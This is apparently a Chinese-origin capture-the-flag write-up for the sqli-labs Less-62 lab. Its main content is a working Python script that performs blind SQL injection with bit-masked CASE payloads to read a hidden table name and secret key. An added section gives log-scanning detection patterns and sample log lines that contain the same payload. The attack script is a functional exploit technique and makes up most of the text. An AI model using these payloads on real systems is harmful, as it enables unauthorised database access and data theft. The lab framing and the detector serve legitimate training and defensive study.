Sqli labs less 62
2021/9/30 19:11:37
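1. This challenge uses boolean-based injection to obtain a secret key. The key is stored in a table with a random name in the challenges database, and it must be obtained in no more than 130 requests.
2. Following a write-up found online, run a script.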
Principle: when retrieving the table name or the key, checking whether bit 7 is 1 tells us whether the character is a digit or a letter. Bit 6 can be ignored: for a digit that bit is 1, and for a letter we do not care about case, so we do not care whether that bit is 0 or 1. For each character we therefore only need to retrieve bit 7 and the low 5 bits.

```python
#!/usr/bin/python3
# -*-coding:utf-8-*-

import re
import requests

url = "http://192.168.2.140:8083/Less-62/index.php"  # change this to your address
try_count = 0


def extract_bits(query, i, bit_values: list):
    """
    Get 3 bits of the i-th character (counting from 1) of the result of query.
    Which 3 bits are read is determined by bit_values.
    """
    global try_count
    assert len(bit_values) == 8
    # OR all candidate values together to get the mask of the bits being read
    bit_marks = 0
    for v in bit_values:
        bit_marks |= v

    payload = """
    '+(
        SELECT CASE ASCII(SUBSTRING(({query}), {i}, 1)) & ({bit_mark})
            WHEN {0} THEN 1
            WHEN {1} THEN 2
            WHEN {2} THEN 3
            WHEN {3} THEN 4
            WHEN {4} THEN 5
            WHEN {5} THEN 6
            WHEN {6} THEN 7
            ELSE 8
        END
    )+'
    """.format(*bit_values[:7], query=query, bit_mark=bit_marks, i=i)
    payload = re.sub(r'\s+', ' ', payload.strip().replace("\n", " "))
    # print(payload)

    resp = requests.get(url, params={"id": payload})
    try_count += 1

    # Login names of the rows with id 1..8; the name in the response
    # tells us which of the 8 candidate values matched
    infos = ["Angelina", "Dummy", "secure", "stupid", "superman", "batman", "admin", "admin1"]
    match = re.search(r"Your Login name : (.*?)<br>", resp.text)
    assert match
    assert match.group(1) in infos
    bits = bit_values[infos.index(match.group(1))]
    return bits


def extract_data(query, length):
    """
    Get length characters of the result of query; for each character
    only bit 7 and the low 5 bits are retrieved.
    """
    res = ""
    for i in range(1, length + 1):
        b2 = extract_bits(query, i, [0b00000000, 0b00000001, 0b00000010, 0b00000011,
                                     0b00000100, 0b00000101, 0b00000110, 0b00000111])  # mask 00000111
        b1 = extract_bits(query, i, [0b00000000, 0b00001000, 0b00010000, 0b00011000,
                                     0b01000000, 0b01001000, 0b01010000, 0b01011000])  # mask 01011000
        if (b1 & 0b01000000) == 0:
            # the character is a digit
            bit = b1 | b2 | 0b00100000
        else:
            # the character is a letter
            bit = b1 | b2
        res += chr(bit)
    return res


if __name__ == "__main__":
    table_name = extract_data(
        "select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1", 10)
    print("table_name:", table_name)

    secret_key = extract_data(
        "select c from (select 1 as a, 2 as b, 3 as c, 4 as d "
        "union select * from challenges.%s limit 1,1)x" % table_name, 24)
    print("secret_key:", secret_key)

    print("Done. try_count:", try_count)
```
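Seen from the server side, the requests sent by the script above all carry the same recognisable construct in the `id` parameter: a CASE over a bit-masked ASCII(SUBSTRING(...)) value. The following is an added example, not part of the original write-up, that scans access-log lines for that construct and counts flagged requests per client; the log lines, client addresses, threshold and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlencode, urlsplit, parse_qs

# Shape of the payload built by extract_bits(): a CASE over a bit-masked
# ASCII(SUBSTRING(...)) value, i.e. one character read a few bits at a time.
BITWISE_CASE = re.compile(
    r"case\s+ascii\s*\(\s*substr(?:ing)?\s*\(.*?\)\s*&\s*\(?\s*\d+", re.I | re.S)
META_SCHEMA = re.compile(r"information_schema\.", re.I)

def classify(request_path):
    """Return the names of the rules that the decoded `id` parameter triggers."""
    params = parse_qs(urlsplit(request_path).query)
    value = " ".join(params.get("id", []))
    hits = []
    if BITWISE_CASE.search(value):
        hits.append("bitwise-case-extraction")
    if META_SCHEMA.search(value):
        hits.append("information_schema-access")
    return hits

def scan(log_lines, threshold=3):
    """Count flagged requests per client; return clients at or above threshold."""
    per_client = Counter()
    for line in log_lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) ', line)
        if m and classify(m.group(2)):
            per_client[m.group(1)] += 1
    return {ip: n for ip, n in per_client.items() if n >= threshold}

def _line(ip, id_value):
    # Constructed access-log line in combined-log style (sample data only).
    path = "/Less-62/index.php?" + urlencode({"id": id_value})
    return f'{ip} - - [30/Sep/2021:19:11:37 +0800] "GET {path} HTTP/1.1" 200 812'

# Constructed sample: four extraction requests from one client, two normal ones.
PAYLOAD = ("'+( SELECT CASE ASCII(SUBSTRING((select table_name from "
           "information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1), {i}, 1))"
           " & (7) WHEN 0 THEN 1 WHEN 1 THEN 2 ELSE 8 END )+'")
SAMPLE_LOG = [_line("203.0.113.5", PAYLOAD.format(i=i)) for i in range(1, 5)]
SAMPLE_LOG += [_line("198.51.100.9", "1"), _line("198.51.100.9", "2")]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Because the response to every such request is a normal 200 page with a valid login name, status codes and error logs show nothing; the query string is the only place this traffic stands out.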
3. Retrieve the data